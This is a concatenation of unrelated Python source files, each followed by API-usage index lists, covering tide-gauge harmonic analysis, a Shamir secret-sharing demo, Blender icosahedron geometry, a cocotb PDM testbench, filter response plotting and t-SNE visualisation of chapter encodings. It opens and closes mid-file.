('sit' in label and 'still' in label): return "Sitting still" elif label == "still" or 'standing' == label or label == 'standing still': return "Self-selected free standing" else: return 'Unknown' def _load_task_class_map(): map_filepath = pkg_resources.resource_filename( 'arus', 'spades_lab/task_class_map.csv') return pd.read_csv(map_filepath) def class_set(*annot_dfs, task_names=None, st=None, et=None, pid=None, **kwargs): class_labels = {mh.TIMESTAMP_COL: [st], mh.START_TIME_COL: [st], mh.STOP_TIME_COL: [et]} task_class_map = _load_task_class_map() annot_df = annot_dfs[0] activity = _annot_to_activity(annot_df, pid, st, et) for task_name in task_names: if task_name not in task_class_map.columns: logger.warning( f"{task_name} is not a valid task name for the current dataset") else: class_label = task_class_map.loc[task_class_map.ACTIVITY == activity, task_name] class_labels[task_name] = class_label.values.tolist() class_vector = pd.DataFrame.from_dict(class_labels) return class_vector
[ "numpy.sum", "pandas.DataFrame.from_dict", "pandas.read_csv", "loguru.logger.warning", "pkg_resources.resource_filename", "numpy.timedelta64" ]
[((4347, 4419), 'pkg_resources.resource_filename', 'pkg_resources.resource_filename', (['"""arus"""', '"""spades_lab/task_class_map.csv"""'], {}), "('arus', 'spades_lab/task_class_map.csv')\n", (4378, 4419), False, 'import pkg_resources\n'), ((4440, 4465), 'pandas.read_csv', 'pd.read_csv', (['map_filepath'], {}), '(map_filepath)\n', (4451, 4465), True, 'import pandas as pd\n'), ((5245, 5281), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['class_labels'], {}), '(class_labels)\n', (5267, 5281), True, 'import pandas as pd\n'), ((269, 310), 'numpy.sum', 'np.sum', (['(rows.iloc[:, 2] - rows.iloc[:, 1])'], {}), '(rows.iloc[:, 2] - rows.iloc[:, 1])\n', (275, 310), True, 'import numpy as np\n'), ((4911, 4990), 'loguru.logger.warning', 'logger.warning', (['f"""{task_name} is not a valid task name for the current dataset"""'], {}), "(f'{task_name} is not a valid task name for the current dataset')\n", (4925, 4990), False, 'from loguru import logger\n'), ((1124, 1154), 'numpy.timedelta64', 'np.timedelta64', (['interval', '"""ms"""'], {}), "(interval, 'ms')\n", (1138, 1154), True, 'import numpy as np\n')]
#!/usr/bin/env python2 # -*- coding: utf-8 -*- """ Created on Sun Feb 24 13:31:37 2019 @author: gsolana Based on: https://github.com/sam-cox/pytides/wiki/How-to-make-your-own-Tide-Table-using-Python-and-Pytides https://ocefpaf.github.io/python4oceanographers/blog/2014/07/07/pytides/ """ import csv import numpy as np import pandas as pd from pandas import read_csv, DataFrame from datetime import datetime, timedelta import matplotlib.pyplot as plt from pytides import tide from pytides import constituent ##Import our tidal data filepath='../data/sealevel/' def ibane_deck2017(): """ Read and descompese Inhambanes deck tidal gauge seal level serie """ t = [] heights = [] filename='Datos_mareografo_c.csv' csv_file = open(filepath+filename, 'r') reader = csv.reader(csv_file) next(reader) next(reader) for row in reader: #print(" ".join(row[:6])) a=row[0]+" "+row[1] t.append(datetime.strptime(a, "%y/%m/%d %H:%M:%S")) heights.append(float((row[3]))) csv_file.close() ##Fit the tidal data to the harmonic model using Pytides ibaneconst= [ constituent._M2, constituent._S2, constituent._N2, constituent._K2, constituent._K1, constituent._O1] my_tide = tide.Tide.decompose(np.array(heights[::1]), np.array(t[::1]), constituents=ibaneconst) return t, heights, my_tide def readUHSML(): '''#Read UHSML 2011 dataset ''' t = [] heights = [] filename2011='Inhambane_2011-07-02_2011-09-27_h900a.csv' csv_file2011 = open(filepath+filename2011, 'r') reader = csv.reader(csv_file2011, delimiter=',') for row in reader: tmp = float(row[4]) if (tmp <= -30000) : next(reader) else: #print(" ".join(row[:6])) a=row[0]+"/"+row[1]+"/"+row[2]+" "+row[3] t.append(datetime.strptime(a, "%Y/%m/%d %H") - 0*timedelta(hours=1.15)) heights.append(float((row[4]))/1000) csv_file2011.close() ##UHSLC Fit the tidal data to the harmonic model using Pytides my_tide2011 = tide.Tide.decompose(np.array(heights[::]), np.array(t[::])) return t, heights, my_tide2011 def read_otpx(): """ """ otpx_prediction='/home/gsolana/Work/UP_Unisaf/00 PesquisaEXtensao/2017 Modelicacao Baia/00_Work/00_Python/Datos/tpxo/ibane_predict_OTPX_9v1.out' otpx_prediction='ibane_predict_OTPX_9v1.out' #Read TPXO Atlas data prediction otpx_pred=read_csv( filepath+otpx_prediction, sep=r'\s+', header=3, skiprows=6, names=['Lat', 'Lon', 'Date', 'Time', 'Z', 'Depth'], parse_dates = {'date_col' : ["Date", "Time"]} ) #Change date_col to strin to datetime format otpx_pred['date_col'] = pd.to_datetime(otpx_pred['date_col']) ##Fit the tidal data to the harmonic model using Pytides OTPX_tide = tide.Tide.decompose(otpx_pred.Z, otpx_pred.date_col) return otpx_pred.date_col, otpx_pred.Z, OTPX_tide def saveFig(file=""): """ Save the figure INPUT: filename : the complete filename (path + filename + extension) """ if file != "": plt.savefig('../sample/'+file+'.png', format='png', dpi=300) plt.savefig('../sample/'+file+'.pdf', format='pdf', dpi=300, transparent=True) def main(): """ """ # Ibane tidal gauge ibane_t, ibane_heights, ibane_tide = ibane_deck2017() constituent = [c.name for c in ibane_tide.model['constituent']] df_ibane = DataFrame(ibane_tide.model, index=constituent).drop('constituent', axis=1) ############################################################################## ##UHSLC Fit the tidal data to the harmonic model using Pytides t, heights, UHSLM_tide2011 = readUHSML() ##UHSLC Fit the tidal data to the harmonic model using Pytides #UHSLM_tide2011 = tide.Tide.decompose(np.array(heights[::]), np.array(t[::])) #constituent = [c.name for c in tide.model['constituent']] UHSLM_constituent = [c.name for c in UHSLM_tide2011.model['constituent']] UHSLM_df2011 = DataFrame(UHSLM_tide2011.model, index=UHSLM_constituent).drop('constituent', axis=1) UHSLM_prediction201707 = UHSLM_tide2011.at(ibane_t) ############################################################################## otpx_t, otpx_z, OTPX_tide=read_otpx() OTPX_constituent = [c.name for c in OTPX_tide.model['constituent']] OTPX_df = DataFrame(OTPX_tide.model, index=OTPX_constituent).drop('constituent', axis=1) OTPX_prediction201707=OTPX_tide.at(ibane_t) ################################################################################# fig = plt.figure(figsize=(6,4)) fig.suptitle('Tidal level',fontsize=9) ax2 = plt.subplot() ax2.grid(b=True, linestyle='-') ax2.plot(ibane_t, ibane_heights-df_ibane.amplitude['Z0'], "-", c="red", label="2017 Observed Ibane deck") ax2.plot(ibane_t, UHSLM_prediction201707-UHSLM_df2011.amplitude['Z0'], "-", c="blue", label="UHSLC 2017 Modeled") ax2.plot(ibane_t, OTPX_prediction201707-OTPX_df.amplitude['Z0'], "-", c="green", label="TPXO Atlas Modeled") ax2.set_xticklabels(ax2.get_xticklabels(),rotation=-45,horizontalalignment='center') #ax2.set_xlabel('Date') yrange = (-1.50, 1.5) ax2.set_ylim(yrange) ax2.set_ylabel('Sea level (m)') ax2.legend(loc ='lower center',fontsize=8) #plt.tight_layout() fig.show() saveFig(file='tidalcomparation') if __name__ == "__main__": main()
[ "pandas.DataFrame", "matplotlib.pyplot.subplot", "pytides.tide.Tide.decompose", "csv.reader", "pandas.read_csv", "matplotlib.pyplot.figure", "datetime.datetime.strptime", "pandas.to_datetime", "numpy.array", "datetime.timedelta", "matplotlib.pyplot.savefig" ]
[((828, 848), 'csv.reader', 'csv.reader', (['csv_file'], {}), '(csv_file)\n', (838, 848), False, 'import csv\n'), ((1731, 1770), 'csv.reader', 'csv.reader', (['csv_file2011'], {'delimiter': '""","""'}), "(csv_file2011, delimiter=',')\n", (1741, 1770), False, 'import csv\n'), ((2620, 2795), 'pandas.read_csv', 'read_csv', (['(filepath + otpx_prediction)'], {'sep': '"""\\\\s+"""', 'header': '(3)', 'skiprows': '(6)', 'names': "['Lat', 'Lon', 'Date', 'Time', 'Z', 'Depth']", 'parse_dates': "{'date_col': ['Date', 'Time']}"}), "(filepath + otpx_prediction, sep='\\\\s+', header=3, skiprows=6,\n names=['Lat', 'Lon', 'Date', 'Time', 'Z', 'Depth'], parse_dates={\n 'date_col': ['Date', 'Time']})\n", (2628, 2795), False, 'from pandas import read_csv, DataFrame\n'), ((2953, 2990), 'pandas.to_datetime', 'pd.to_datetime', (["otpx_pred['date_col']"], {}), "(otpx_pred['date_col'])\n", (2967, 2990), True, 'import pandas as pd\n'), ((3073, 3125), 'pytides.tide.Tide.decompose', 'tide.Tide.decompose', (['otpx_pred.Z', 'otpx_pred.date_col'], {}), '(otpx_pred.Z, otpx_pred.date_col)\n', (3092, 3125), False, 'from pytides import tide\n'), ((4918, 4944), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(6, 4)'}), '(figsize=(6, 4))\n', (4928, 4944), True, 'import matplotlib.pyplot as plt\n'), ((5003, 5016), 'matplotlib.pyplot.subplot', 'plt.subplot', ([], {}), '()\n', (5014, 5016), True, 'import matplotlib.pyplot as plt\n'), ((1412, 1434), 'numpy.array', 'np.array', (['heights[::1]'], {}), '(heights[::1])\n', (1420, 1434), True, 'import numpy as np\n'), ((1436, 1452), 'numpy.array', 'np.array', (['t[::1]'], {}), '(t[::1])\n', (1444, 1452), True, 'import numpy as np\n'), ((2248, 2268), 'numpy.array', 'np.array', (['heights[:]'], {}), '(heights[:])\n', (2256, 2268), True, 'import numpy as np\n'), ((2271, 2285), 'numpy.array', 'np.array', (['t[:]'], {}), '(t[:])\n', (2279, 2285), True, 'import numpy as np\n'), ((3362, 3426), 'matplotlib.pyplot.savefig', 'plt.savefig', (["('../sample/' + file + '.png')"], {'format': '"""png"""', 'dpi': '(300)'}), "('../sample/' + file + '.png', format='png', dpi=300)\n", (3373, 3426), True, 'import matplotlib.pyplot as plt\n'), ((3431, 3517), 'matplotlib.pyplot.savefig', 'plt.savefig', (["('../sample/' + file + '.pdf')"], {'format': '"""pdf"""', 'dpi': '(300)', 'transparent': '(True)'}), "('../sample/' + file + '.pdf', format='pdf', dpi=300,\n transparent=True)\n", (3442, 3517), True, 'import matplotlib.pyplot as plt\n'), ((987, 1028), 'datetime.datetime.strptime', 'datetime.strptime', (['a', '"""%y/%m/%d %H:%M:%S"""'], {}), "(a, '%y/%m/%d %H:%M:%S')\n", (1004, 1028), False, 'from datetime import datetime, timedelta\n'), ((3737, 3783), 'pandas.DataFrame', 'DataFrame', (['ibane_tide.model'], {'index': 'constituent'}), '(ibane_tide.model, index=constituent)\n', (3746, 3783), False, 'from pandas import read_csv, DataFrame\n'), ((4321, 4377), 'pandas.DataFrame', 'DataFrame', (['UHSLM_tide2011.model'], {'index': 'UHSLM_constituent'}), '(UHSLM_tide2011.model, index=UHSLM_constituent)\n', (4330, 4377), False, 'from pandas import read_csv, DataFrame\n'), ((4682, 4732), 'pandas.DataFrame', 'DataFrame', (['OTPX_tide.model'], {'index': 'OTPX_constituent'}), '(OTPX_tide.model, index=OTPX_constituent)\n', (4691, 4732), False, 'from pandas import read_csv, DataFrame\n'), ((2004, 2039), 'datetime.datetime.strptime', 'datetime.strptime', (['a', '"""%Y/%m/%d %H"""'], {}), "(a, '%Y/%m/%d %H')\n", (2021, 2039), False, 'from datetime import datetime, timedelta\n'), ((2044, 2065), 'datetime.timedelta', 'timedelta', ([], {'hours': '(1.15)'}), '(hours=1.15)\n', (2053, 2065), False, 'from datetime import datetime, timedelta\n')]
#!/usr/bin/env python3 ''' Code by <NAME>, <<EMAIL>> based on "How to Share a Secret" by <NAME> Published by :Communications of the ACM November 1979, Volume 22, Num. 11 ''' import numpy as np import random def split_secret(secret, k, n): ''' Secret in an integer k is the minimum number of keys to get the secret back n is the total number of keys generated ''' #Create two empty lists and a dictionary D = {} A = [] B = [] #Set A0 to be the secret, as defined a0 = D A.append(int(secret)) #Fill the rest of the list A, from A1 to An, with #random numbers, as defined in paper "we pick a random # k-1 polynomial" for j in range(1,n): A.append(random.randrange(1,100)) #Evaluate each polynomial, q(i) for i in range(1,n+1): #First item is A0 B.append(A[0]) #Every other item is evaluated by substituting x for j in range(1,k): B.append(A[j]*i**j) #Sum all the polynomial terms, save sum as Di #these are your keys D[i] = sum(B) B = [] #reset B in order to use again empty return D def get_secret(k,keys): ''' k is the number of keys you are supplying ''' #Create 3 empty lists A = [] D = [] C = [] #Re-create the polynomials to solve # for the coefficients for i in range(1,k+2): C.append(1) for j in range(1,k+1): C.append(i**j) A.append(C) D.append(keys[i-1]) C = [] #Solve Ax = D # x are our coeeficients(a0 to an) a = np.array(A) d = np.array(D) x = np.linalg.solve(a,d) #The original Secret is a0 return int(x[0]) if __name__ == '__main__': ''' Call split_secret() to generate keys Call get_secret() to recover your original secret Disclaimer: get_secret() just takes the first k keys and assumes they are in order, this can be easily implemented for any keys in any order, but this code is simply to highlight the simplicity of the (k, n) threshold scheme ''' keys = split_secret('12345678910',3,5) recovered_secret = get_secret(3,keys) print(recovered_secret) ''' Thanks to <NAME> and <NAME> for review of the code Thanks to <NAME> for the inspiration, and ByteAcademy in NY for teaching me Python '''
[ "numpy.linalg.solve", "numpy.array", "random.randrange" ]
[((1611, 1622), 'numpy.array', 'np.array', (['A'], {}), '(A)\n', (1619, 1622), True, 'import numpy as np\n'), ((1631, 1642), 'numpy.array', 'np.array', (['D'], {}), '(D)\n', (1639, 1642), True, 'import numpy as np\n'), ((1651, 1672), 'numpy.linalg.solve', 'np.linalg.solve', (['a', 'd'], {}), '(a, d)\n', (1666, 1672), True, 'import numpy as np\n'), ((724, 748), 'random.randrange', 'random.randrange', (['(1)', '(100)'], {}), '(1, 100)\n', (740, 748), False, 'import random\n')]
import numpy as np id = None with open('set_splits/bboxes_train_val_test_split_3buckets.csv', 'r') as bboxes: count_boxes = [] boxes = 0 for line in bboxes: filename, x1, y1, x2, y2, class_name, bucket, set = line.strip().split(',') new_id = filename.split('_')[0] if not id: id = new_id if id == new_id: boxes += 1 else: count_boxes.append(boxes) id = new_id boxes = 1 print(len(count_boxes)) np_arr = np.array(count_boxes) mean = np.mean(np_arr) print(mean)
[ "numpy.mean", "numpy.array" ]
[((542, 563), 'numpy.array', 'np.array', (['count_boxes'], {}), '(count_boxes)\n', (550, 563), True, 'import numpy as np\n'), ((574, 589), 'numpy.mean', 'np.mean', (['np_arr'], {}), '(np_arr)\n', (581, 589), True, 'import numpy as np\n')]
import numpy as np from numpy.linalg import norm from funcs.general_functions import * from Topologies.Icosahedron import getNewBaseIcosahedron, subdivide from funcs.general_functions import getFlatAngle LABEL = "Truncated Icosahedron" OPERATOR = "mesh.create_truncated_icosahedron" # create operator class MESH_OT_CreateTruncatedIcosahedron(bpy.types.Operator): bl_idname = OPERATOR bl_label = LABEL def execute(self, context): (obj, mesh) = createNewEmptyObject(LABEL) # create Bmesh bm = getNewBaseIcosahedron(2) bm = truncateSolid(bm) bm.to_mesh(mesh) obj.select_set(True) # set properties props = mesh.SphereTopology props.sphere_radius = 2 props.sphere_type = LABEL props.sphere_resolution = 1 setSphereUpdated(props) props.sphere_do_update = True return {'FINISHED'} def register(): bpy.utils.register_class(MESH_OT_CreateTruncatedIcosahedron) def unregister(): bpy.utils.unregister_class(MESH_OT_CreateTruncatedIcosahedron) ############################################ # ATTENTION! updateSphereResolution() doesn't normalize vertices to keep the same dimensions of the generating Icosahedron. # this means that morphSphere() will have a "jump" the first time it is used # must keep this prototype def updateSphereResolution(mesh): """ rebuilds the sphere with new parameters in mesh.SphereTopology. Required if vertex structure changes, else use morphSphere :param mesh: """ bm = bmesh.new() bm.from_mesh(mesh) mytool = mesh.SphereTopology res = mytool.sphere_resolution radius = mytool.sphere_radius bm.verts.ensure_lookup_table() # get bmesh of default IcoSphere bm = getNewBaseIcosahedron(radius) iterations = res - 1 # noinspection PyTypeChecker subdivide(bm, iterations, radius) bm = truncateSolid(bm) bm.to_mesh(mesh) bm.free() setSphereUpdated(mytool) # must keep this prototype def morphSphere(mesh): """ move pre-existing vertices around after a change in the radius, without changing the number of vertices/faces :param mesh: """ bm = bmesh.new() bm.from_mesh(mesh) mytool = mesh.SphereTopology radius = mytool.sphere_radius # update all vertices for v in bm.verts: normalizeVert(v, radius) bm.to_mesh(mesh) bm.free() setSphereUpdated(mytool) def truncateSolid(bm_old) -> bmesh: bm = bmesh.new() bm_old.normal_update() pentagon_vertices = {v: [] for v in bm_old.verts} hexagon_vertices = {f: [] for f in bm_old.faces} for edge in bm_old.edges: a = np.array(edge.verts[0].co) b = np.array(edge.verts[1].co) v1 = bm.verts.new((2 * a + b) / 3) v2 = bm.verts.new((a + 2 * b) / 3) pentagon_vertices[edge.verts[0]].append(v1) pentagon_vertices[edge.verts[1]].append(v2) hexagon_vertices[edge.link_faces[0]] += [v1, v2] hexagon_vertices[edge.link_faces[1]] += [v1, v2] bm.verts.ensure_lookup_table() # for each pentagon and hexagon, sort vertices in anticlockwise order around the old vertex/face normal and create new face for old_elem, vertices in {**pentagon_vertices, **hexagon_vertices}.items(): orderedVerts = sortAntiClockwise3D(old_elem.normal, vertices) bm.faces.new(orderedVerts) bm_old.free() return bm def sortAntiClockwise3D(normal, verts): # if normal is vertical, use simple flat trigonometry if abs(normal[0]) < 0.0001 and abs(normal[1]) < 0.0001: return sorted(verts, key=lambda v: getFlatAngle(v.co)) # convert to local coordinates on the 2D plane of the future face to sort using flat angles n = np.array(normal) z = n / norm(n) u = np.array([0, 0, 1]) k = u - np.dot(u, z) * z x = k / norm(k) y = np.cross(z, x) return sorted(verts, key=lambda vert: getFlatAngle(convertToFlatCoordinates(vert.co, x, y))) def convertToFlatCoordinates(coords, x, y): co = np.array(coords) return [np.dot(co, x), np.dot(co, y)]
[ "Topologies.Icosahedron.subdivide", "numpy.cross", "numpy.linalg.norm", "numpy.array", "numpy.dot", "Topologies.Icosahedron.getNewBaseIcosahedron", "funcs.general_functions.getFlatAngle" ]
[((1778, 1807), 'Topologies.Icosahedron.getNewBaseIcosahedron', 'getNewBaseIcosahedron', (['radius'], {}), '(radius)\n', (1799, 1807), False, 'from Topologies.Icosahedron import getNewBaseIcosahedron, subdivide\n'), ((1871, 1904), 'Topologies.Icosahedron.subdivide', 'subdivide', (['bm', 'iterations', 'radius'], {}), '(bm, iterations, radius)\n', (1880, 1904), False, 'from Topologies.Icosahedron import getNewBaseIcosahedron, subdivide\n'), ((3773, 3789), 'numpy.array', 'np.array', (['normal'], {}), '(normal)\n', (3781, 3789), True, 'import numpy as np\n'), ((3818, 3837), 'numpy.array', 'np.array', (['[0, 0, 1]'], {}), '([0, 0, 1])\n', (3826, 3837), True, 'import numpy as np\n'), ((3895, 3909), 'numpy.cross', 'np.cross', (['z', 'x'], {}), '(z, x)\n', (3903, 3909), True, 'import numpy as np\n'), ((4062, 4078), 'numpy.array', 'np.array', (['coords'], {}), '(coords)\n', (4070, 4078), True, 'import numpy as np\n'), ((534, 558), 'Topologies.Icosahedron.getNewBaseIcosahedron', 'getNewBaseIcosahedron', (['(2)'], {}), '(2)\n', (555, 558), False, 'from Topologies.Icosahedron import getNewBaseIcosahedron, subdivide\n'), ((2693, 2719), 'numpy.array', 'np.array', (['edge.verts[0].co'], {}), '(edge.verts[0].co)\n', (2701, 2719), True, 'import numpy as np\n'), ((2732, 2758), 'numpy.array', 'np.array', (['edge.verts[1].co'], {}), '(edge.verts[1].co)\n', (2740, 2758), True, 'import numpy as np\n'), ((3802, 3809), 'numpy.linalg.norm', 'norm', (['n'], {}), '(n)\n', (3806, 3809), False, 'from numpy.linalg import norm\n'), ((3879, 3886), 'numpy.linalg.norm', 'norm', (['k'], {}), '(k)\n', (3883, 3886), False, 'from numpy.linalg import norm\n'), ((4091, 4104), 'numpy.dot', 'np.dot', (['co', 'x'], {}), '(co, x)\n', (4097, 4104), True, 'import numpy as np\n'), ((4106, 4119), 'numpy.dot', 'np.dot', (['co', 'y'], {}), '(co, y)\n', (4112, 4119), True, 'import numpy as np\n'), ((3850, 3862), 'numpy.dot', 'np.dot', (['u', 'z'], {}), '(u, z)\n', (3856, 3862), True, 'import numpy as np\n'), ((3649, 3667), 'funcs.general_functions.getFlatAngle', 'getFlatAngle', (['v.co'], {}), '(v.co)\n', (3661, 3667), False, 'from funcs.general_functions import getFlatAngle\n')]
# This file is public domain, it can be freely copied without restrictions. # SPDX-License-Identifier: CC0-1.0 import numpy as np import cocotb from cocotb.clock import Clock from cocotb.triggers import FallingEdge, Timer import sys sys.path.append('../../../py/') import pdm WINDOW_LEN = 250 def get_msg(i, received, expected): return 'idx {}, dut output of {}, expected {}'.format(i, received, expected) def get_test_vector(): n = 100 # x = np.random.randint(2**15, size=n) t = np.linspace(0, 1, n) x = np.cos(2*np.pi * 5 * t) * (2**15 - 1) x = pdm.pcm_to_pdm_pwm(x) # x = pdm.pcm_to_pdm_random(x) # x = pdm.pcm_to_pdm_err(x) print('generated pdm sig', x[10:]) print('len x', len(x)) y = pdm.pdm_to_pcm(x, 2) print('expected values', y) print('len y', len(y)) return x, y async def check_output(dut): print('Beginning test with random input data.') x, y = get_test_vector() i = 0 # index into x j = 0 # index into y while i < len(x): dut.data_i <= int(x[i]) # valid = np.random.randint(2) # randomly de-assert valid valid = 1 dut.valid_i <= (1 if valid else 0) await Timer(1, units='us') # let combinational logic work if (dut.valid_o.value.integer): expected_val = y[j] received_val = dut.data_o.value.signed_integer if (j >= 2): # first TWO values are garbage assert received_val == expected_val, get_msg(i, received_val, expected_val) j += 1 print('\r{}/{}'.format(j, len(y)), end='') if (valid): i += 1 await FallingEdge(dut.clk_i) async def check_output_no_en(dut): '''Check that dut doesn't output valid data if en if off.''' print('Beginning test with random input data but en_i is low.') await Timer(1, units='us') for i in range(1000): dut.data_i <= int(np.random.randint(2)) # feed in garbage data dut.valid_i <= 1 assert dut.valid_o == 0 await FallingEdge(dut.clk_i) @cocotb.test() async def main(dut): """ Test Rectified Linear Unit """ # Create a 10us period clock on port clk clock = Clock(dut.clk_i, 10, units="us") cocotb.fork(clock.start()) # Reset system await FallingEdge(dut.clk_i) dut.rst_n_i <= 0 dut.en_i <= 0 dut.data_i <= 0 dut.valid_i <= 0 # reset await FallingEdge(dut.clk_i) dut.rst_n_i <= 1 # test 1 dut.en_i <= 1 await check_output(dut) # test 2 dut.en_i <= 0 await check_output_no_en(dut) # test 3 dut.en_i <= 1 await check_output(dut)
[ "sys.path.append", "cocotb.clock.Clock", "pdm.pcm_to_pdm_pwm", "cocotb.triggers.Timer", "cocotb.test", "cocotb.triggers.FallingEdge", "numpy.random.randint", "numpy.linspace", "pdm.pdm_to_pcm", "numpy.cos" ]
[((236, 267), 'sys.path.append', 'sys.path.append', (['"""../../../py/"""'], {}), "('../../../py/')\n", (251, 267), False, 'import sys\n'), ((2134, 2147), 'cocotb.test', 'cocotb.test', ([], {}), '()\n', (2145, 2147), False, 'import cocotb\n'), ((502, 522), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', 'n'], {}), '(0, 1, n)\n', (513, 522), True, 'import numpy as np\n'), ((578, 599), 'pdm.pcm_to_pdm_pwm', 'pdm.pcm_to_pdm_pwm', (['x'], {}), '(x)\n', (596, 599), False, 'import pdm\n'), ((741, 761), 'pdm.pdm_to_pcm', 'pdm.pdm_to_pcm', (['x', '(2)'], {}), '(x, 2)\n', (755, 761), False, 'import pdm\n'), ((2265, 2297), 'cocotb.clock.Clock', 'Clock', (['dut.clk_i', '(10)'], {'units': '"""us"""'}), "(dut.clk_i, 10, units='us')\n", (2270, 2297), False, 'from cocotb.clock import Clock\n'), ((531, 556), 'numpy.cos', 'np.cos', (['(2 * np.pi * 5 * t)'], {}), '(2 * np.pi * 5 * t)\n', (537, 556), True, 'import numpy as np\n'), ((1919, 1939), 'cocotb.triggers.Timer', 'Timer', (['(1)'], {'units': '"""us"""'}), "(1, units='us')\n", (1924, 1939), False, 'from cocotb.triggers import FallingEdge, Timer\n'), ((2359, 2381), 'cocotb.triggers.FallingEdge', 'FallingEdge', (['dut.clk_i'], {}), '(dut.clk_i)\n', (2370, 2381), False, 'from cocotb.triggers import FallingEdge, Timer\n'), ((2485, 2507), 'cocotb.triggers.FallingEdge', 'FallingEdge', (['dut.clk_i'], {}), '(dut.clk_i)\n', (2496, 2507), False, 'from cocotb.triggers import FallingEdge, Timer\n'), ((1196, 1216), 'cocotb.triggers.Timer', 'Timer', (['(1)'], {'units': '"""us"""'}), "(1, units='us')\n", (1201, 1216), False, 'from cocotb.triggers import FallingEdge, Timer\n'), ((1717, 1739), 'cocotb.triggers.FallingEdge', 'FallingEdge', (['dut.clk_i'], {}), '(dut.clk_i)\n', (1728, 1739), False, 'from cocotb.triggers import FallingEdge, Timer\n'), ((2109, 2131), 'cocotb.triggers.FallingEdge', 'FallingEdge', (['dut.clk_i'], {}), '(dut.clk_i)\n', (2120, 2131), False, 'from cocotb.triggers import FallingEdge, Timer\n'), ((1992, 2012), 'numpy.random.randint', 'np.random.randint', (['(2)'], {}), '(2)\n', (2009, 2012), True, 'import numpy as np\n')]
import numpy as np from numpy.polynomial import polynomial as poly import scipy.signal as signal import matplotlib.pyplot as plt # Component values GAIN = 1.0 R6 = 10e3 Ra = 100e3 * GAIN R10b = 2e3 + 100e3 * (1-GAIN) R11 = 15e3 R12 = 422e3 C3 = 0.1e-6 C5 = 68e-9 C7 = 82e-9 C8 = 390e-12 a0s = C7 * C8 * R10b * R11 * R12 a1s = C7 * R10b * R11 + C8 * R12 * (R10b + R11) a2s = R10b + R11 b0s = a0s b1s = C7 * R11 * R12 + a1s b2s = R12 + a2s w, h = signal.freqs([b0s, b1s, b2s], [a0s, a1s, a2s], worN=np.logspace(1.3, 4.3, 1000)*(2*np.pi)) plt.semilogx(w/(2*np.pi), 20*np.log10(np.abs(h+np.finfo(float).eps))) plt.show() # Create impedances # z1Num = R6 # poly.Polynomial((1, R6 * (C3 + C5))) # z1Den = poly.Polynomial((0, C3, R6 * C3 * C5)) # z2Num = R10b + R11 # poly.Polynomial((R10b + R11, C7 * R10b * R11)) # z2Den = 1.0 # poly.Polynomial((1, C7 * R11)) # z3Num = R12 # z3Den = 1 # poly.Polynomial((1, C8 * R12)) # # Simplify # b_s = z1Den * Ra * (z3Den * z2Num + z2Den * z3Num) # a_s = z2Den * z3Den * (Ra * z1Den + z1Num) # print(b_s.coef) # print(a_s.coef) # w, h = signal.freqs(b_s.coef, a_s.coef, worN=np.logspace(0, 2, 1000)*(2*np.pi)) # plt.semilogx(w/(2*np.pi), 20*np.log10(np.abs(h+np.finfo(float).eps))) # plt.show()
[ "numpy.logspace", "matplotlib.pyplot.show", "numpy.finfo" ]
[((613, 623), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (621, 623), True, 'import matplotlib.pyplot as plt\n'), ((503, 530), 'numpy.logspace', 'np.logspace', (['(1.3)', '(4.3)', '(1000)'], {}), '(1.3, 4.3, 1000)\n', (514, 530), True, 'import numpy as np\n'), ((590, 605), 'numpy.finfo', 'np.finfo', (['float'], {}), '(float)\n', (598, 605), True, 'import numpy as np\n')]
import numpy as np from sklearn.manifold import TSNE from keyphrase.dataset import keyphrase_test_dataset from keyphrase.dataset.keyphrase_test_dataset import testing_data_loader from emolga.dataset.build_dataset import deserialize_from_file, serialize_to_file from keyphrase.config import * # We'll use matplotlib for graphics. import matplotlib.pyplot as plt import matplotlib.patheffects as PathEffects import matplotlib # We import seaborn to make nice plots. import seaborn as sns sns.set_style('darkgrid') sns.set_palette('muted') sns.set_context("notebook", font_scale=1.5, rc={"lines.linewidth": 2.5}) def chapter_scatter(x): colors = np.asarray([book_name_id[doc['book_id']] for doc in docs]) # We choose a color palette with seaborn. palette = np.array(sns.color_palette("hls", 10)) # # We create a scatter plot. f = plt.figure(figsize=(20, 20)) # ax = plt.subplot(aspect='equal') # sc = ax.scatter(x[:,0], x[:,1], lw=0, s=40, # c=palette[colors.astype(np.int)]) # plt.xlim(-25, 25) # plt.ylim(-25, 25) # ax.axis('off') # ax.axis('tight') # # # We add the labels for each digit. # txts = [] # for i in range(len(colors)): # # Position of each label. # xtext, ytext = np.median(x[colors == i, :], axis=0) # txt = ax.text(xtext, ytext, str(i), fontsize=24) # txt.set_path_effects([ # PathEffects.Stroke(linewidth=5, foreground="w"), # PathEffects.Normal()]) # txts.append(txt) for label, x, y in zip([doc['name'] + '-' + doc['title'] for doc in docs], x[:, 0], x[:, 1]): label = str(label) if not label.startswith('mir') and not label.startswith('iir'): continue print(label) book_name = label[:label.index('_')] begin_index = label.find('_') + 1 end_index = label.find('_', label.index('_') + 1) if end_index == -1: end_index = label.find('-') chapter_number = int(label[begin_index: end_index]) print(book_name + '-' + str(chapter_number)) if book_name=='mir': if chapter_number < 2 or chapter_number > 8: continue color = 'r' if book_name=='iir': if chapter_number < 1 or chapter_number > 12: continue color = 'g' plt.annotate(label, xy=(x, y), xytext=(0, 0), textcoords='offset points') plt.scatter(x, y, lw=0, s=40, c=color) plt.savefig(config['predict_path']+'/ir_sections_tsne-generated.png', dpi=120) plt.show() def plot_chapter_vectors(): for doc, encoding in zip(docs, input_encodings): print('*' * 50) print(doc['name'] + ' - ' + doc['title']) doc['forward_encoding'] = encoding[0][-1][:300] doc['backward_encoding'] = encoding[0][0][300:] doc['book_id'] = doc['name'][:doc['name'].index('_')] # print(doc['book_id'] + ':' + doc['name'] + ' - ' + doc['title']) # print(doc['encoding']) if doc['book_id'] not in book_name_id: book_name_id[doc['book_id']] = len(book_name_id) # serialize_to_file(docs, config['path'] + '/dataset/textbook_linking/docs.pkl') X = np.asarray([doc['forward_encoding'] for doc in docs]) model = TSNE(n_components=2, random_state=0) np.set_printoptions(suppress=True) digits_proj = model.fit_transform(X) chapter_scatter(digits_proj) def cut_zero(sample_index, idx2word): sample_index = list(sample_index) # if 0 not in sample: # return ['{}'.format(idx2word[w].encode('utf-8')) for w in sample] # # return the string before 0 (<eol>) # return ['{}'.format(idx2word[w].encode('utf-8')) for w in sample[:sample.index(0)]] if 0 in sample_index: sample_index = sample_index[:sample_index.index(0)] wordlist = [] find_copy = False for w_index in sample_index: if w_index >= config['voc_size']: 